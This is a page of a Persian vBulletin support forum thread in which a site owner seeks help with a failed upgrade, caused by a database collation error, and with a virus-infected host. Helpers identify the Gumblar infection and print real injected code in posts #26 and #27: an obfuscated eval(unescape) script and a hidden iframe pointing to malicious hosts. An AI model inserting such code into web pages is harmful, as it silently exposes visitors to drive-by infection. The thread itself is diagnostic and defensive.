تبلیغات در اینترنت

تبلیغات در اینترنتگیفت کارت گوگل پلی
صفحه 3 از 3 نخستنخست 123
نمایش نتایج: از 21 به 28 از 28

موضوع: كسي ميتونه به من توي آپگريد انجمن و درست كردن مشكل ويروسي شدن هاست به من كمك كنه؟

  1. Top | #21
    مدیر بازنشته

    تاریخ عضویت
    Mar 2011
    ورژن ویبولتین
    4.1.9
    نوشته ها
    3,995
    مورد پسند
    3,578 بار
    نوشته های وبلاگ
    2
    اطلاعات
    میزان امتیاز
    477

    پیش فرض

    نقل قول نوشته اصلی توسط ReZaPishgam نمایش پست ها
    سلام داداش
    ممنون
    .
    داداش مشکل آپگرید رو چیکار کنم؟
    .
    ممنون میشم کمکم کنید.

    این جواب مسئول سرور به من در رابطه با نصب آنتی ویروس هست.
    چی کار کنم؟؟
    احتمالا منظورشون حذف کلی فایل هاست ...

    کاربر مقابل از Ariyan بابت این پست مفید تشکر کرده است:





  2. گیفت کارت آیتونز

  3. Top | #22
    کاربر ویژه

    تاریخ عضویت
    Dec 2010
    ورژن ویبولتین
    Always Last Version of DGT
    نوشته ها
    667
    مورد پسند
    841 بار
    اطلاعات
    میزان امتیاز
    89

    پیش فرض

    اگه ویروساتون پاک شد میتونید برای حل مشکل گوگل از گوگل وبمستر یا این لینک هم کمک بگیرید.

    کاربر مقابل از SaeeD بابت این پست مفید تشکر کرده است:

    Linkin Park - Burn It Down
    You told me yes
    You held me high
    And I believed when you told that lie
    I played soldier, you played king
    And struck me down, when I kissed that ring
    You lost that right, to hold that crown
    I built you up, but you let me down
    So when you fall, i'll take my turn
    And fan the flames
    As your blazes burn

  4. Top | #23
    کاربر ویژه

    تاریخ عضویت
    Dec 2010
    ورژن ویبولتین
    --
    نوشته ها
    28
    مورد پسند
    26 بار
    اطلاعات
    میزان امتیاز
    0

    پیش فرض

    این ویروس اسمش گامبلار یا همون ifromer هست که توی اکثر فایلهای login و function ها کد مخرب تهشون اضافه می کنه برای پاک سازی کامل دستی فایلها رو باز کنید و کد ویروس رو پاک کنید .

    کاربر مقابل از ProgReza بابت این پست مفید تشکر کرده است:


  5. Top | #24
    کاربر سایت

    تاریخ عضویت
    Sep 2010
    ورژن ویبولتین
    4.2.0
    سن
    25
    نوشته ها
    934
    مورد پسند
    429 بار
    نوشته های وبلاگ
    1
    اطلاعات
    میزان امتیاز
    106

    پیش فرض

    سلام به همگي
    ممنون از جوابهاتون.

    نقل قول نوشته اصلی توسط VBIran نمایش پست ها
    خوب بپرسید با چی حل میشه پس ؟

    یک توضیح کوتاه بدید .
    داداش توضيحات كه توي پست اول داده شده بود.
    وقتي ميخوام آپگريد كنم، توي استپ 89 اين ارور مياد و ديگه نميشه جلو رفت.

    اينم متن ارور:

    کد PHP:
    Unexpected Text:<?xml version="1.0" encoding="windows-1252"?>  <?xml version="1.0" encoding="windows-1252"?> <errors>      <error><=!=[=C=D=A=T=A=[<p>Database Error</p>   Invalid SQL:              (SELECT 'package' AS classtype,  package.packageid AS typeid, package.packageid AS packageid,                  package.productid AS productid, if(package.productid = 'vbulletin',  1, product.active) AS enabled,                 package.class AS class,  -1 as isaggregator             FROM package AS package             LEFT  JOIN product AS product                     ON product.productid =  package.productid             WHERE product.active = 1                  OR package.productid = 'vbulletin'             )              UNION               (SELECT 'contenttype' AS classtype, contenttypeid AS typeid,  contenttype.packageid AS packageid,                 1, 1,  contenttype.class AS class  ,  contenttype.isaggregator             FROM  contenttype AS contenttype             INNER JOIN package AS package ON  package.packageid = contenttype.packageid             LEFT JOIN product  AS product ON product.productid = package.productid             WHERE  product.active = 1             OR package.productid = 'vbulletin'  );   Illegal mix of collations (latin1_general_ci,IMPLICIT) and  (latin1_swedish_ci,IMPLICIT) for operation '=']=]=></error>      <error_html><=!=[=C=D=A=T=A=[<p>Database error in  vBulletin 3.8.4</p> <p>Invalid SQL:              (SELECT  'package' AS classtype, package.packageid AS typeid, package.packageid  AS packageid,                 package.productid AS productid,  if(package.productid = 'vbulletin', 1, product.active) AS enabled,                  package.class AS class, -1 as isaggregator             FROM  package AS package             LEFT JOIN product AS product                      ON product.productid = package.productid             WHERE  product.active = 1                 OR package.productid = 'vbulletin'              )              UNION              (SELECT 'contenttype' AS  classtype, contenttypeid AS typeid, contenttype.packageid AS packageid,                  1, 1, contenttype.class AS class  ,   contenttype.isaggregator             FROM contenttype AS contenttype              INNER JOIN package AS package ON package.packageid =  contenttype.packageid             LEFT JOIN product AS product ON  product.productid = package.productid             WHERE product.active =  1             OR package.productid = 'vbulletin'  );<p> <p>  <strong>MySQL Error</strong>   : Illegal mix of collations  (latin1_general_ci,IMPLICIT) and (latin1_swedish_ci,IMPLICIT) for  operation '='<br /> <strong>Error Number</strong>  :  1267<br /> <strong>Request Date</strong>  : Monday,  May 30th 2011 @ 04:16:06 PM<br /> <strong>Error  Date</strong>    : Monday, May 30th 2011 @ 04:16:07 PM<br />  <strong>Script</strong>        :  http://www.forum******.com/vb/upgrade.php<br />  <strong>Referrer</strong>      :  http://www.forum******.com/vb/upgrade.php<br />  <strong>Classname</strong>     : vB_Database<br />  <strong>MySQL Version</strong> : 5.0.92-community-log<br  /> </p>]=]=></error_html> </errors
    این ویروس اسمش گامبلار یا همون ifromer هست که توی اکثر فایلهای login و function ها کد مخرب تهشون اضافه می کنه برای پاک سازی کامل دستی فایلها رو باز کنید و کد ویروس رو پاک کنید .
    اينجوري كه تمام فايلهارو دونه دونه بايد اديت كرد.
    فايلها زيادن.
    اصلا اون كدي كه بايد پاك بشه چي هست؟
    هرکس به اندازه ای که هست احساسش میکنند.
    یاد بگیریم که از دیگران برای گذاشتن پستهای خوب و جواب دادن به ما تشکر کنیم.
    مرجع تخصصی تاریخ: Tarikhfa.com
    مرجع معماری ایران و جهان: MemarFa.com

  6. Top | #25
    کاربر سایت

    تاریخ عضویت
    Sep 2010
    ورژن ویبولتین
    4.2.0
    سن
    25
    نوشته ها
    934
    مورد پسند
    429 بار
    نوشته های وبلاگ
    1
    اطلاعات
    میزان امتیاز
    106

    پیش فرض

    من هنوز منتظرم.
    کسی نیست کمکم کنه؟
    هرکس به اندازه ای که هست احساسش میکنند.
    یاد بگیریم که از دیگران برای گذاشتن پستهای خوب و جواب دادن به ما تشکر کنیم.
    مرجع تخصصی تاریخ: Tarikhfa.com
    مرجع معماری ایران و جهان: MemarFa.com

  7. Top | #26
    کاربر ویژه

    تاریخ عضویت
    Dec 2010
    ورژن ویبولتین
    --
    نوشته ها
    28
    مورد پسند
    26 بار
    اطلاعات
    میزان امتیاز
    0

    پیش فرض

    شما انقدر سایتت رو دستکاری نکن چون هر جا بری اگه کد ویروس توی فایل باشه توی جاهای دیگه هم کپی میشه ,

    نمونه فایل Index.html آلوده شده به این ویروس ( قسمت قرمز رنگ کد ویروس می باشد )

    <bb1><!--7cL96_TAeNoNx0kOgCAMAMAfUcDlxmOQRZtYamghPl/nNpDnwa2YxASV+yBAimcRmDgxi3Z8/ohGHYKJG2DL5TWX0h1CcH6127I76z/qNBnI--><bb2></body></html><script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E %77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%7 2%63%3D%22%68%74%74%70%3A%2F%2F%73%69%65%6E%68%75% 2E%63%6F%6D%2F%3F%32%35%31%32%31%32%39%35%33%22%20 %77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3 E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->
    این ویروس بعد از وارد شدن به هاست , کد خود را در انتهای کد فایل Index.html واقع در روت قرار می دهد و بعد از لاگین شدن در سایت و رفتن به قسمتهای مختلف خود را در انتهای کدها کپی می کند ,

    در واقع هر فایلی در هاست شما با نام های :

    Index.html

    Index.php

    Login.php

    هر فایلی که در آن کلمه Login داشته باشد مانند function ها

    هر فایلی که کلمه Main داشته باشد .

    فایلهایی که نام بردم را یکی یکی پیدا و باز کنید و کد ویروس را از انتهای آن حذف کنید و بعد از ذخیره کردن , دسترسی آن فایل را فقط بصورت Read قرار دهد تا دیگر ویروس قادر به ویرایش آن نشود .

    کاربر مقابل از ProgReza بابت این پست مفید تشکر کرده است:


  8. Top | #27
    کاربر سایت

    تاریخ عضویت
    Sep 2010
    ورژن ویبولتین
    4.2.0
    سن
    25
    نوشته ها
    934
    مورد پسند
    429 بار
    نوشته های وبلاگ
    1
    اطلاعات
    میزان امتیاز
    106

    پیش فرض

    سلام داداش
    ممنون بخاطر كمكت
    من توي فايل هاي ايندكس گشتم ولي چنين چيزي نبود.
    توي يك ايندكسي كه خودم كارهاي طراحيشو انجام داده بودم رفتم و يهو تعجب كردم.
    تمام كدهاي مربوط به من پاك شده و اين كد در اون زير قرار گرفته.
    <html><head>
    <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">

    <title>Under Construction</title>
    </head><body cellspacing="0" cellpadding="0" text="gray" bgcolor="black">
    <br><br><br><center><table>
    <tbody><tr>
    <td><img src="http://jigoli.ir/i/upload/1/1306798413.jpg"><br></td><td></td>
    </tr>
    <tr>
    <td><center>

    </font>
    </center></td>
    </tr>
    </tbody></table></center>
    <iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1>hi</iframe>
    </body></html>
    من تمام فايلهاي اضافي روي هاست بجز فروم رو دارم پاك مبكنم ببينم درست ميشه يا نه.
    ويروس مربوط به كد بالا نميشد؟؟
    هرکس به اندازه ای که هست احساسش میکنند.
    یاد بگیریم که از دیگران برای گذاشتن پستهای خوب و جواب دادن به ما تشکر کنیم.
    مرجع تخصصی تاریخ: Tarikhfa.com
    مرجع معماری ایران و جهان: MemarFa.com

  9. Top | #28
    کاربر ویژه

    تاریخ عضویت
    Dec 2010
    ورژن ویبولتین
    Always Last Version of DGT
    نوشته ها
    667
    مورد پسند
    841 بار
    اطلاعات
    میزان امتیاز
    89

    پیش فرض

    اگه دیتابیس ویروسی نشده به نظرم همه فایلهای هاست رو پاک کنید و دوباره ویبولتین رو روی هاست بریزید و کانفیگ قبلی رو ست کنید و بزنید برای آپگرید.
    ولی دیگه دوباره باید هک ها و استایل ها رو نصب کنی.ولی خوبیش به اینه که از ویروس خبری نمیمونه و مشکلت حل میشه.
    اگه نمیدونی آموزش لازم هست.جستوجو کن پیدا میکنی.

    در ضمن مک کافی سایت ادویزور من این اررور رو میده وقتی میری تو سایت.
    از ویروس داخل سایتت اشکال نمیگیره ولی از آمار گیر وبگذر نمیگذره و ارور میده.
    http://www.siteadvisor.com/exploit.h...os_ver=6.1.1.0
    ویرایش توسط SaeeD : 2011/06/19 در ساعت 01:10 AM

    2 تشکر توسط:

    Linkin Park - Burn It Down
    You told me yes
    You held me high
    And I believed when you told that lie
    I played soldier, you played king
    And struck me down, when I kissed that ring
    You lost that right, to hold that crown
    I built you up, but you let me down
    So when you fall, i'll take my turn
    And fan the flames
    As your blazes burn

صفحه 3 از 3 نخستنخست 123

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

موضوعات مشابه

  1. كدهدرم به هم ريخت كسي ميتونه كگدش رو بده؟
    توسط فروم - پاسارگاد در انجمن پرسش و پاسخ
    پاسخ: 2
    آخرين نوشته: 2011/11/22, 11:00 AM
  2. ويرايش نوشته توي هدر
    توسط Razagh در انجمن درخواست های گرافیکی ( درجه ، هدر ، بنر و .. )
    پاسخ: 9
    آخرين نوشته: 2011/11/19, 12:27 PM
  3. پاسخ: 2
    آخرين نوشته: 2011/09/06, 08:42 PM
  4. يه مشكل عجيب توي نصب ويبي
    توسط loverha در انجمن پرسش و پاسخ
    پاسخ: 5
    آخرين نوشته: 2011/07/31, 06:40 PM

کلمات کلیدی این موضوع

علاقه مندی ها (Bookmarks)

علاقه مندی ها (Bookmarks)

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •